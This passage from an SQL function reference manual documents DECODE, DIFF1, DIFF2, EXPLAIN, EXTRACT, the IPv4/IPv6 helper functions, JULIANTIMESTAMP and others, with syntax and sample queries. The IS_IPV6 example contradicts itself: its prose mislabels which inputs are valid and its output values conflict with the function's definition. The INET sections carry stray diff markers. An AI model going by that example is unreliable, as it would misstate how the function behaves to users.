perform well.\r\n\r\nThe syntax\r\n\r\n```\r\nDECODE (expr, test_expr, retval [, test_expr2, retval2 ... ] [, default ] ):\r\n```\r\n\r\nis logically equivalent to the following:\r\n\r\n```\r\nCASE\r\n WHEN (expr IS NULL AND test-expr IS NULL) OR expr = test-expr THEN retval\r\n WHEN (expr IS NULL AND test-expr2 IS NULL) OR expr = test_expr2 THEN retval2\r\n ...\r\n ELSE default \/* or ELSE NULL if _default_ not specified *\/\r\nEND\r\n```\r\n\r\nNo special conversion of _expr_, _test-exprN_, or _retvalN_ exist\r\nother than what a CASE statement normally does.\r\n\r\n[[examples_of_decode]]\r\n<<<\r\n=== Examples of DECODE\r\n\r\n* Example of the DECODE function:\r\n+\r\n```\r\nSELECT\r\n emp_name\r\n, DECODE( CAST (( yrs_of_service + 3) \/ 4 AS INT )\r\n , 0,0.04\r\n , 1,0.04\r\n , 0.06\r\n ) as perc_value\r\nFROM employees;\r\n\r\nSELECT\r\n supplier_name\r\n, DECODE( supplier_id\r\n , 10000\r\n , 'Company A'\r\n , 10001\r\n , 'Company B'\r\n , 10002\r\n , 'Company C'\r\n , 'Company D'\r\n ) as result\r\nFROM suppliers;\r\n```\r\n\r\n* This example shows a different way of handling NULL specified as\r\ndefault and not specified as default explicitly:\r\n+\r\n```\r\nSELECT DECODE( (?p1 || ?p2), trim(?p1), 'Hi', ?p3, null ) from emp;\r\n..\r\n*** ERROR[4049] A CASE expression cannot have a result data type of both CHAR(2) and NUMERIC(18,6).\r\n*** ERROR[4062] The preceding error actually occurred in function DECODE((?P1 || ?P2),(' ' TRIM ?P1), 'Hi', ?P3, NULL)\r\n*** ERROR[8822] The statement was not prepared.\r\n```\r\n+\r\nThe last _ret-val_ is an explicit NULL. When {project-name} SQL encounters\r\nthis situation, it assumes that the return value will be NUMERIC(18,6).\r\nOnce {project-name} SQL determines that the return values are numeric, it\r\ndetermines that all possible return values must be numeric. When 'Hi' is\r\nencountered in a _ret-val_ position, the error is produced because the\r\nCHAR(2) type argument is not comparable with a NUMERIC(18,6) type return\r\nvalue.\r\n+\r\nThis statement is equivalent and will not produce an error:\r\n+\r\n```\r\nSELECT DECODE( (?p1 || ?p2), trim(?p1), 'Hi' ) from emp;\r\n```\r\n\r\n<<<\r\n[[degrees_function]]\r\n== DEGREES Function\r\n\r\nThe DEGREES function converts a numeric value expression expressed in\r\nradians to the number of degrees.\r\n\r\nDEGREES is a {project-name} SQL extension.\r\n\r\n```\r\nDEGREES (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the DEGREES function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_degrees]]\r\n=== Examples of Degrees\r\n\r\n* This function returns the value 45.0001059971939008 in degrees:\r\n+\r\n```\r\nDEGREES(0.78540)\r\n```\r\n\r\n* This function returns the value of 45. The function degrees is the\r\ninverse of the function radians.\r\n+\r\n```\r\nDEGREES(RADIANS(45))\r\n```\r\n\r\n<<<\r\n[[diff1_function]]\r\n== DIFF1 Function\r\n\r\nThe DIFF1 function is a sequence function that calculates the amount of\r\nchange in an expression from row to row in an intermediate result table\r\nordered by a sequence by clause in a select statement.\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>>. \r\n\r\nDIFF1 is a {project-name} SQL extension.\r\n\r\n```\r\nDIFF1 (column-expression-a [,column-expression-b])\r\n```\r\n\r\n* `_column-expression-a_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify only one column as an argument, DIFF1 returns\r\nthe difference between the value of the column in the current row and\r\nits value in the previous row; this version calculates the unit change\r\nin the value from row to row.\r\n\r\n* `_column-expression-b_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify two columns as arguments, DIFF1 returns the\r\ndifference in consecutive values in _column-expression-a_ divided by\r\nthe difference in consecutive values in _column-expression-b_.\r\n\r\nThe purpose of the second argument is to distribute the amount of change\r\nfrom row to row evenly over some unit of change (usually time) in\r\nanother column.\r\n\r\n[[considerations_for_diff1]]\r\n=== Considerations for DIFF1\r\n\r\n[[equivalent-result]]\r\n==== Equivalent Result\r\n\r\nIf you specify one argument, the result of DIFF1 is equivalent to:\r\ncolumn-expression-a - OFFSET(column-expression-a, 1) If you specify two\r\narguments, the result of DIFF1 is equivalent to:\r\n\r\n```\r\nDIFF1(column-expression-a) \/ DIFF1(column-expression-b)\r\n```\r\n\r\nThe two-argument version involves division by the result of the DIFF1\r\nfunction. To avoid divide-by-zero errors, be sure that\r\n_column-expression-b_ does not contain any duplicate values whose DIFF1\r\ncomputation could result in a divisor of zero.\r\n\r\n[[datetime-arguments]]\r\n==== Datetime Arguments\r\n\r\nIn general, {project-name} SQL does not allow division by a value of INTERVAL\r\ndata type. However, to permit use of the two-argument version of DIFF1\r\nwith times and dates, {project-name} SQL relaxes this restriction and allows\r\ndivision by a value of INTERVAL data type.\r\n\r\n[[examples_of_diff1]]\r\n=== Examples of DIFF1\r\n\r\n* Retrieve the difference between the I1 column in the current row and\r\nthe I1 column in the previous row:\r\n+\r\n```\r\nSELECT DIFF1 (I1) AS DIFF1_I1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_I1\r\n------------\r\n ?\r\n 21959\r\n -9116\r\n -14461\r\n 7369\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe first row retrieved displays null because the offset from the\r\ncurrent row does not fall within the results set.\r\n\r\n* Retrieve the difference between the TS column in the current row and\r\nthe TS column in the previous row:\r\n+\r\n```\r\nSELECT DIFF1 (TS) AS DIFF1_TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_TS\r\n--------------------\r\n ?\r\n 30002620.000000\r\n 134157861.000000\r\n 168588029.000000\r\n 114055223.000000\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are expressed as the number of seconds. For example, the\r\ndifference between TIMESTAMP '1951-02-15 14:35:49' and TIMESTAMP\r\n'1950-03-05 08:32:09' is approximately 347 days. The difference between\r\nTIMESTAMP '1955-05-18 08:40:10' and TIMESTAMP '1951-02-15 14:35:49' is\r\napproximately 4 years and 3 months, and so on.\r\n\r\n<<<\r\n* This query retrieves the difference in consecutive values in I1\r\ndivided by the difference in consecutive values in TS:\r\n+\r\n```\r\nSELECT DIFF1 (I1,TS) AS DIFF1_I1TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF1_I1TS\r\n-------------------\r\n ?\r\n .0007319\r\n -.0000679\r\n -.0000857\r\n .0000646\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are equivalent to the quotient of the results from the two\r\npreceding examples. For example, in the second row of the output of this\r\nexample, 0.0007319 is equal to 21959 divided by 30002620.\r\n\r\n\r\n<<<\r\n[[diff2_function]]\r\n== DIFF2 Function\r\n\r\nThe DIFF2 function is a sequence function that calculates the amount of\r\nchange in a DIFF1 value from row to row in an intermediate result table\r\nordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nDIFF2 is a {project-name} SQL extension.\r\n\r\n```\r\nDIFF2 (column-expression-a [,column-expression-b])\r\n```\r\n\r\n* `_column-expression-a_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify only one column as an argument, DIFF2 returns\r\nthe difference between the value of DIFF1(_column-expression-a_) in\r\nthe current row and the same result in the previous row.\r\n\r\n* `_column-expression-b_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If you specify two columns as arguments, DIFF2 returns the\r\ndifference in consecutive values of DIFF1(_column-expression-a_)\r\ndivided by the difference in consecutive values in\r\n_column-expression-b_.\r\nSee <<diff1_function,DIFF1 Function>>.\r\n\r\n[[considerations_for_diff2]]\r\n=== Considerations for DIFF2\r\n\r\n[[equivalent_result_1]]\r\n==== Equivalent Result\r\n\r\n* If you specify one argument, the result of DIFF2 is equivalent to:\r\n+\r\n```\r\nDIFF1(column-expression-a)- OFFSET(DIFF1(column-expression-a),1)\r\n```\r\n\r\n* If you specify two arguments, the result of DIFF2 is equivalent to:\r\n+\r\n```\r\nDIFF2(column-expression-a) \/ DIFF1(column-expression-b)\r\n```\r\n\r\nThe two-argument version involves division by the result of the DIFF1\r\nfunction. To avoid divide-by-zero errors, be sure that\r\n_column-expression-b_ does not contain any duplicate values whose DIFF1\r\ncomputation could result in a divisor of zero.\r\n\r\n\r\n[[datetime_arguments]]\r\n==== Datetime Arguments\r\n\r\nIn general, {project-name} SQL does not allow division by a value of INTERVAL\r\ndata type. However, to permit use of the two-argument version of DIFF2\r\nwith times and dates, {project-name} SQL relaxes this restriction and allows\r\ndivision by a value of INTERVAL data type.\r\n\r\n[[examples_of_diff2]]\r\n=== Examples of DIFF2\r\n\r\n* Retrieve the difference between the value of DIFF1(I1) in the current\r\nrow and the same result in the previous row:\r\n+\r\n```\r\nSELECT DIFF2 (I1) AS DIFF2_I1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF2_I1\r\n--------------------\r\n ?\r\n ?\r\n -31075\r\n -5345\r\n 21830\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe results are equal to the difference of DIFF1(I1) for the current row\r\nand DIFF1(I1) of the previous row. For example, in the third row of the\r\noutput of this example, -31075 is equal to\r\n-91 6 minus 21959. The value -91 6 is the result of DIFF1(I1) for the\r\ncurrent row, and the\r\nvalue 21959 is the result of DIFF1(I1) for the previous row.\r\nSee <<examples_of_diff1,Examples of DIFF1>>.\r\n\r\n* Retrieve the difference in consecutive values of DIFF1(I1) divided by\r\nthe difference in consecutive values of TS:\r\n+\r\n```\r\nSELECT DIFF2 (I1,TS) AS DIFF2_I1TS\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nDIFF2_I1TS\r\n---------------------\r\n ?\r\n ?\r\n -.000231\r\n -.000031\r\n .000191\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[exp_function]]\r\n== EXP Function\r\n\r\nThis function returns the exponential value (to the base e) of a numeric\r\nvalue expression. EXP is a {project-name} SQL extension.\r\n\r\n```\r\nEXP (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the EXP function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\nThe minimum input value must be between -744.4400719 and -744.4400720.\r\n\r\nThe maximum input value must be between 709.78271289338404 and\r\n709.78271289338405.\r\n\r\n[[examples_of_exp]]\r\n=== Examples of EXP\r\n\r\n* This function returns the value 3.49034295746184128E+000, or\r\napproximately 3.4903:\r\n+\r\n```\r\nEXP (1.25)\r\n```\r\n\r\n* This function returns the value 2.0. The function EXP is the inverse\r\nof the function LOG:\r\n+\r\n```\r\nEXP (LOG(2.0))\r\n```\r\n\r\n<<<\r\n[[explain_function]]\r\n== EXPLAIN Function\r\n\r\nThe EXPLAIN function is a table-valued stored function that generates a\r\nresult table describing an access plan for a SELECT, INSERT, DELETE, or\r\nUPDATE statement.\r\nSee <<result_of_the_explain_function,Result of the EXPLAIN Function>>.\r\n\r\nThe EXPLAIN function can be specified as a table reference (_table_)\r\nin the FROM clause of a SELECT statement if it is preceded by the\r\nkeyword TABLE and surrounded by parentheses.\r\n\r\nFor information on the EXPLAIN statement,\r\nsee <<explain_statement,EXPLAIN Statement>>.\r\n\r\n```\r\nEXPLAIN (module,'statement-pattern')\r\n```\r\n\r\n* `_module_ is:`\r\n+\r\n```\r\n'module-name' | NULL\r\n```\r\n\r\n* `'_module-name_'`\r\n+\r\nReserved for future use.\r\n\r\nThe module name is enclosed in single quotes and is case-sensitive. If a\r\nmodule name is uppercase, the value you specify within single quotes\r\nmust be uppercase. For example: 'MYCAT.MYSCH.MYPROG'\r\n\r\n* `NULL`\r\n+\r\nexplains statements prepared in the session. '_statement-pattern_'\r\n+\r\nA statement pattern is enclosed in single quotes and is case-sensitive.\r\nThe statement name must be in uppercase, unless you delimit the statement\r\nname in a PREPARE statement.\r\n\r\n[[considerations_for_explain_function]]\r\n=== Considerations for EXPLAIN Function\r\n\r\n\r\n[[using_a_statement_pattern]]\r\n==== Using a Statement Pattern\r\n\r\nUsing a statement pattern is analogous to using a LIKE pattern. You can\r\nuse the LIKE pattern in the following ways:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN(NULL,'S%'));\r\nSELECT * FROM table (EXPLAIN(NULL,'S1'));\r\nSELECT * FROM table (EXPLAIN(NULL,'%1'));\r\n```\r\n\r\nHowever, you cannot use the LIKE pattern in this way:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN (NULL, '%'))\r\n```\r\n\r\nThis statement returns the EXPLAIN result for all prepared statements\r\nwhose names begin with the uppercase letter 'S':\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN (NULL,'S%'))\r\n```\r\n\r\nIf the statement pattern does not find any matching statement names, no\r\nrows are returned as the result of the SELECT statement.\r\n\r\n\r\n[[obtaining_an_explain_plan_while_queries_are_running]]\r\n==== Obtaining an EXPLAIN Plan While Queries Are Running\r\n\r\n{project-name} SQL provides the ability to capture an EXPLAIN plan for a\r\nquery at any time while the query is running with the QID option. By\r\ndefault, this behavior is disabled for a {project-name} session.\r\n\r\nNOTE: Enable this feature before you start preparing and executing\r\nqueries.\r\n\r\nAfter this feature is enabled, use the following syntax in an EXPLAIN\r\nfunction to get the query execution plan of a running query:\r\n\r\n```\r\nSELECT * FROM table (EXPLAIN(NULL, 'QID=_qid_'))\r\n```\r\n\r\n* `_qid_` is a case-sensitive identifier, which represents the query ID. For\r\nexample:\r\n+\r\n```\r\n'QID=MXID01001011194212103659400053369000000085905admin00_2605_S1'\r\n```\r\n\r\nThe EXPLAIN function or statement returns the plan that was generated\r\nwhen the query was prepared. EXPLAIN for QID retrieves all the\r\ninformation from the original plan of the executing query. The plan is\r\navailable until the query finishes executing and is removed or\r\ndeallocated.\r\n\r\n<<<\r\n[[result_of_the_explain_function]]\r\n==== Result of the EXPLAIN Function\r\n\r\nThe result table of the EXPLAIN function describes the access plans for\r\nSELECT, INSERT, DELETE, or UPDATE statements.\r\n\r\nIn this description of the result of the EXPLAIN function, an operator\r\ntree is a structure that represents operators used in an access plan as\r\nnodes, with at most one parent node for each node in the tree, and with\r\nonly one root node.\r\n\r\nA node of an operator tree is a point in the tree that represents an\r\nevent (involving an operator) in a plan. Each node might have\r\nsubordinate nodes — that is, each event might generate a subordinate event\r\nor events in the plan.\r\n\r\n[cols=\"30%l,30%l,40%\",options=\"header\"]\r\n|===\r\n| Column Name | Data Type | Description\r\n| MODULE_NAME | CHAR(60) | Reserved for future use.\r\n| STATEMENT_ NAME | CHAR(60) | Statement name; truncated on the right if longer than 60 characters.\r\n| PLAN_ID | LARGEINT | Unique system-generated plan ID automatically assigned by {project-name} SQL;\r\ngenerated at compile time.\r\n| SEQ_NUM | INT | Sequence number of the current operator in the operator tree; indicates\r\nthe sequence in which the operator tree is generated.\r\n| OPERATOR | CHAR(30) | Current operator type.\r\n| LEFT_CHILD_ SEQ_NUM | INT | Sequence number for the first child operator of the current operator;\r\nnull if node has no child operators.\r\n| RIGHT_CHILD_ SEQ_NUM | INT | Sequence number for the second child operator of the current operator;\r\nnull if node does not have a second child.\r\n| TNAME | CHAR(60) | For operators in scan group, full name of base table, truncated on the\r\nright if too long for column. If correlation name differs from table\r\nname, simple correlation name first and then table name in parentheses.\r\n| CARDINALITY | REAL | Estimated number of rows that will be returned by the current operator.\r\nCardinality appears as ROWS\/REQUEST in some forms of EXPLAIN output. For\r\nthe right child of a nested join, multiply the cardinality by the number\r\nof requests to get the total number of rows produced by this operator.\r\n| OPERATOR_COST | REAL | Estimated cost associated with the current operator to execute the\r\noperator.\r\n| TOTAL_COST | REAL | Estimated cost associated with the current operator to execute the\r\noperator, including the cost of all subtrees in the operator tree.\r\n| DETAIL_COST | VARCHAR (200) | Cost vector of five items, described in the next table.\r\n| DESCRIPTION | VARCHAR (3000) | Additional information about the operator.\r\n|===\r\n\r\nThe DETAIL_COST column of the EXPLAIN function results contains these\r\ncost factors:\r\n\r\n[cols=\"20%l,80%\"]\r\n|===\r\n| CPU_TIME | An estimate of the number of seconds of processor time it might take to\r\nexecute the instructions for this operator. A value of 1.0 is 1 second.\r\n| IO_TIME | An estimate of the number of seconds of I\/O time (seeks plus data\r\ntransfer) to perform the I\/O for this operator.\r\n| MSG_TIME | An estimate of the number of seconds it takes for the messaging for this\r\noperator. The estimate includes the time for the number of local and\r\nremote messages and the amount of data sent.\r\n| IDLETIME | An estimate of the number of seconds to wait for an event to happen. The\r\nestimate includes the amount of time to open a table or start an ESP\r\nprocess.\r\n| PROBES | The number of times the operator will be executed. Usually, this value\r\nis 1, but it can be greater when you have, for example, an inner scan of\r\na nested-loop join.\r\n|===\r\n\r\n[[examples_of_explain_function]]\r\n=== Examples of EXPLAIN Function\r\n\r\n* Display the specified columns in the result table of the EXPLAIN\r\nfunction for the prepared statement REGION:\r\n+\r\n```\r\n>>SELECT seq_num, operator, operator_cost FROM table (EXPLAIN (null, 'REG'));\r\n\r\nSEQ_NUM OPERATOR OPERATOR_COST\r\n----------- ------------------------------ ---------------\r\n 1 TRAFODION_SCAN 0.43691027\r\n 2 ROOT 0.0\r\n\r\n--- 2 row(s) selected.\r\n\r\n>>log;\r\n```\r\n+\r\nThe example displays only part of the result table of the EXPLAIN\r\nfunction. It first uses the EXPLAIN function to generate the table and\r\nthen selects the desired columns.\r\n\r\n<<<\r\n[[extract_function]]\r\n== EXTRACT Function\r\n\r\nThe EXTRACT function extracts a datetime field from a datetime or\r\ninterval value expression. It returns an exact numeric value.\r\n\r\n```\r\nEXTRACT (datetime-field FROM extract-source)\r\n```\r\n\r\n* `_datetime-field_` is:\r\n+\r\nYEAR \\| MONTH \\| DAY \\| HOUR \\| MINUTE \\| SECOND\r\n\r\n* `_extract-source_` is:\r\n+\r\ndatetime-expression \\| interval-expression\r\n\r\nSee <<datetime_value_expressions,Datetime Value Expressions>> and\r\n<<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n[[examples_of_extract]]\r\n=== Examples of EXTRACT\r\n\r\n* Extract the year from a DATE value:\r\n+\r\n```\r\nEXTRACT (YEAR FROM DATE '2007-09-28')\r\n```\r\n+\r\nThe result is 2007.\r\n\r\n* Extract the year from an INTERVAL value:\r\n+\r\n```\r\nEXTRACT (YEAR FROM INTERVAL '01-09' YEAR TO MONTH)\r\n```\r\n+\r\nThe result is 1.\r\n\r\n\r\n<<<\r\n[[hour_function]]\r\n=== HOUR Function\r\n\r\nThe HOUR function converts a TIME or TIMESTAMP expression into an\r\nINTEGER value in the range 0 through 23 that represents the\r\ncorresponding hour of the day.\r\n\r\nHOUR is a {project-name} SQL extension.\r\n\r\n```\r\nHOUR (datetime-expression)\r\n```\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type TIME or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_hour]]\r\n=== Examples of HOUR\r\n\r\n* Return an integer that represents the hour of the day from the\r\nship timestamp column in the project table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, HOUR(ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2007-04-10 2007-04-21 08:15:00.000000 8\r\n```\r\n\r\n<<<\r\n[[insert_function]]\r\n== INSERT Function\r\n\r\nThe INSERT function returns a character string where a specified number\r\nof characters within the character string has been deleted, beginning at\r\na specified start position, and where another character string has been\r\ninserted at the start position. Every character, including multi-byte\r\ncharacters, is treated as one character.\r\n\r\nINSERT is a {project-name} SQL extension.\r\n\r\n```\r\nINSERT (char-expr-1, start, length, char-expr-2)\r\n```\r\n\r\n* `_char-expr-1_, _char-expr-2_`\r\n+\r\nare SQL character value expressions (of data type CHAR or VARCHAR) that\r\nspecify two strings of characters. The character string _char-expr-2_ is\r\ninserted into the character string_char-expr-1_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_start_`\r\n+\r\nspecifies the starting position start within char-expr-1 at which to\r\nstart deleting length number of characters. after the deletion, the\r\ncharacter string char-expr-2 is inserted into the character string\r\n char-expr-1 , beginning at the start position specified by the number\r\n start . The number start must be a value greater than zero of exact\r\nnumeric data type and with a scale of zero.\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to delete from _char-expr-1_. The\r\nnumber _length_ must be a value greater than or equal to zero of exact\r\nnumeric data type and with a scale of zero. _length_ must be less than\r\nor equal to the length of _char-expr-1_.\r\n\r\n[[examples_of_insert]]\r\n=== Examples of INSERT\r\n\r\n* Suppose that your JOB table includes an entry for a sales\r\nrepresentative. Use the INSERT function to change SALESREP to SALES REP:\r\n+\r\n```\r\nUPDATE persnl.job\r\nSET jobdesc = INSERT (jobdesc, 6, 3, ' REP')\r\nWHERE jobdesc = 'SALESREP';\r\n```\r\n+\r\nNow check the row you updated:\r\n+\r\n```\r\nSELECT jobdesc FROM persnl.job WHERE jobdesc = 'SALES REP';\r\n\r\nJob Description\r\n------------------\r\nSALES REP\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[is_ipv4_function]]\r\n== IS_IPV4 Function\r\n\r\nFor a given argument, if it is a valid IPV4 string, IS_IPV4() returns 1 else returns 0. \r\n```\r\nIS_IPV4( expression )\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\nvalidation of the IP address. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, IS_IPV4 returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_is_ipv4]]\r\n=== Examples of IS_IPV4\r\n\r\nThis function returns 1 for the first input argument, since it is a valid IPV4 string; \r\n0 for the second input argument, since it is an invalid IPV4 string.\r\n\r\n```\r\n>>SELECT IS_IPV4('10.0.5.9'), IS_IPV4('10.0.5.256') from dual;\r\n\r\n(EXPR) (EXPR)\r\n------- -------\r\n1 0\r\n```\r\n<<<\r\n[[is_ipv6_function]]\r\n== IS_IPV6 Function\r\n\r\nReturns 1 if the argument is a valid IPv6 address specified as a string, 0 otherwise. \r\nThis function does not consider IPv4 addresses to be valid IPv6 addresses.\r\n\r\n```\r\nIS_IPV6( expression )\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies an expression that determines the values to include in the\r\nvalidation of the IP address. The _expression_ cannot contain an aggregate\r\nfunction or a subquery. If the input value is NULL, IS_IPV6 returns NULL.\r\nSee <<expressions,Expressions>>.\r\n\r\n[[examples_of_is_ipv6]]\r\n=== Examples of IS_IPV6\r\n\r\nThis function returns 0 for the second input argument, since it is a valid IPV6 string; \r\n1 for the second input argument, since it is an invalid IPVr6 string.\r\n\r\n```\r\n>>SELECT IS_IPV6('10.0.5.9'), IS_IPV6('::1') from dual;\r\n(EXPR) (EXPR)\r\n-------- -------\r\n1 0\r\n```\r\n<<<\r\n +[[inet_aton_function]]\r\n +== INET_ATON Function\r\n +\r\n +Given the dotted-quad representation of an IPv4 network address as a string, \r\n +returns an integer that represents the numeric value of the address in network \r\n +byte order (big endian). INET_ATON() returns NULL if it does not understand its argument.\r\n +\r\n +```\r\n +INET_ATON( expression )\r\n +```\r\n +\r\n +* `_expression_`\r\n ++\r\n +specifies an expression that determines the values to include in the\r\n +conversion of the IP address. The _expression_ cannot contain an aggregate\r\n +function or a subquery. If the input value is NULL, INET_ATON returns NULL.\r\n +See <<expressions,Expressions>>.\r\n +\r\n +[[examples_of_inet_aton]]\r\n +=== Examples of INET_ATON\r\n +\r\n +\r\n +```\r\n +>>SELECT INET_ATON('10.0.5.9') from dual;\r\n +\r\n +(EXPR)\r\n +-----------\r\n +167773449 \r\n +```\r\n +<<<\r\n +[[inet_ntoa_function]]\r\n +== INET_NTOA Function\r\n +\r\n +Given a numeric IPv4 network address in network byte order, returns the \r\n +dotted-quad string representation of the address as a nonbinary string in \r\n +the connection character set. INET_NTOA() returns NULL if it does \r\n +not understand its argument.\r\n +\r\n +```\r\n +INET_NTOA( expression )\r\n +```\r\n +\r\n +* `_expression_`\r\n ++\r\n +specifies an expression that determines the values to include in the\r\n +conversion of the number to IP address. The _expression_ cannot contain \r\n +an aggregate function or a subquery. If the input value is NULL, INET_NTOA \r\n +returns NULL. \r\n +See <<expressions,Expressions>>.\r\n +\r\n +[[examples_of_inet_ntoa]]\r\n +=== Examples of INET_NTOA\r\n +\r\n +this function will convert an integer into the dotted-quad string \r\n +representation of the IP address.\r\n +\r\n +```\r\n +>>SELECT INET_NTOA(167773449) from dual\r\n +\r\n +(EXPR)\r\n +-------------\r\n +'10.0.5.9'\r\n +```\r\n +<<<\r\n[[isnull_function]]\r\n== ISNULL Function\r\n\r\nThe ISNULL function returns the value of the first argument if it is not\r\nnull, otherwise it returns the value of the second argument. Both\r\nexpressions must be of comparable types.\r\n\r\nISNULL is a {project-name} SQL extension.\r\n\r\n```\r\nISNULL(ck-expr, repl-value)\r\n```\r\n\r\n* `_ck-expr_`\r\n+\r\nan expression of any valid SQL data type.\r\n\r\n* `_repl-value_`\r\n+\r\nan expression of any valid SQL data type, but must be a comparable type\r\nwith that of _ck-expr_.\r\n\r\n[[examples_of_isnull]]\r\n=== Examples of ISNULL\r\n\r\n* This function returns a 0 instead of a null if value is null.\r\n+\r\n```\r\nISNULL(value,0)\r\n```\r\n\r\n* This function returns the date constant if date_col is null.\r\n+\r\n```\r\nISNULL(date_col, DATE '2006-01-01')\r\n```\r\n\r\n* This function returns 'Smith' if the string column last_name is null.\r\n+\r\n```\r\nISNULL(last_name, 'Smith')\r\n```\r\n\r\n<<<\r\n[[juliantimestamp_function]]\r\n== JULIANTIMESTAMP Function\r\n\r\nThe JULIANTIMESTAMP function converts a datetime value into a 64-bit\r\nJulian timestamp value that represents the number of microseconds that\r\nhave elapsed between 4713 B.C., January 1, 00:00, and the specified\r\ndatetime value. JULIANTIMESTAMP returns a value of data type LARGEINT.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\nJULIANTIMESTAMP is a {project-name} SQL extension.\r\n\r\n```\r\nJULIANTIMESTAMP(datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a value of type DATE, TIME, or\r\nTIMESTAMP. If _datetime-expression_ does not contain all the fields from YEAR through\r\nSECOND, {project-name} SQL extends the value before converting it to a Julian\r\ntimestamp. Datetime fields to the left of the specified datetime value\r\nare set to current date fields. Datetime fields to the right of the\r\nspecified datetime value are set to zero. See\r\n<<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[considerations_for_juliantimestamp]]\r\n=== Considerations for JULIANTIMESTAMP\r\n\r\nThe _datetime-expression_ value must be a date or timestamp value from\r\nthe beginning of year 0001 to the end of year 9999.\r\n\r\n[[examples_of_juliantimestamp]]\r\n=== Examples of JULIANTIMESTAMP\r\n\r\nThe project table consists of five columns using the data types NUMERIC,\r\nVARCHAR, DATE, TIMESTAMP, and INTERVAL.\r\n\r\n* Convert the TIMESTAMP value into a Julian timestamp representation:\r\n+\r\n```\r\nSELECT ship_timestamp, JULIANTIMESTAMP (ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nSHIP_TIMESTAMP (EXPR)\r\n-------------------------- --------------------\r\n2008-04-21 08:15:00.000000 212075525700000000\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Convert the DATE value into a Julian timestamp representation:\r\n+\r\n```\r\nSELECT start_date, JULIANTIMESTAMP (start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nSTART_DATE (EXPR)\r\n---------- --------------------\r\n2008-04-10 212074545600000000\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[lastnotnull_function]]\r\n== LASTNOTNULL Function\r\n\r\nThe LASTNOTNULL function is a sequence function that returns the last\r\nnon-null value of a column in an intermediate result table ordered by a\r\nSEQUENCE BY clause in a SELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nLASTNOTNULL is a {project-name} SQL extension.\r\n\r\n```\r\nLASTNOTNULL(column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If only null values have been returned, LASTNOTNULL returns null.\r\n\r\n[[examples_of_lastnotnull]]\r\n=== Examples of LASTNOTNULL\r\n\r\n* Return the last non-null value of a column:\r\n+\r\n\r\n```\r\nSELECT LASTNOTNULL(I1) AS lastnotnull\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nlastnotnull\r\n-----------\r\n 6215\r\n 6215\r\n 19058\r\n 19058\r\n 11966\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[lcase_function]]\r\n== LCASE Function\r\n\r\nThe LCASE function down-shifts alphanumeric characters. For\r\nnon-alphanumeric characters, LCASE returns the same character. LCASE can\r\nappear anywhere in a query where a value can be used, such as in a\r\nselect list, an ON clause, a WHERE clause, a HAVING clause, a LIKE\r\npredicate, an expression, or as qualifying a new value in an UPDATE or\r\nINSERT statement. The result returned by the LCASE function is equal to\r\nthe result returned by the <<lower_function,LOWER Function>>.\r\n\r\nLCASE returns a string of fixed-length or variable-length character\r\ndata, depending on the data type of the input string.\r\n\r\nLCASE is a {project-name} SQL extension.\r\n\r\n```\r\nLCASE (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression that specifies a 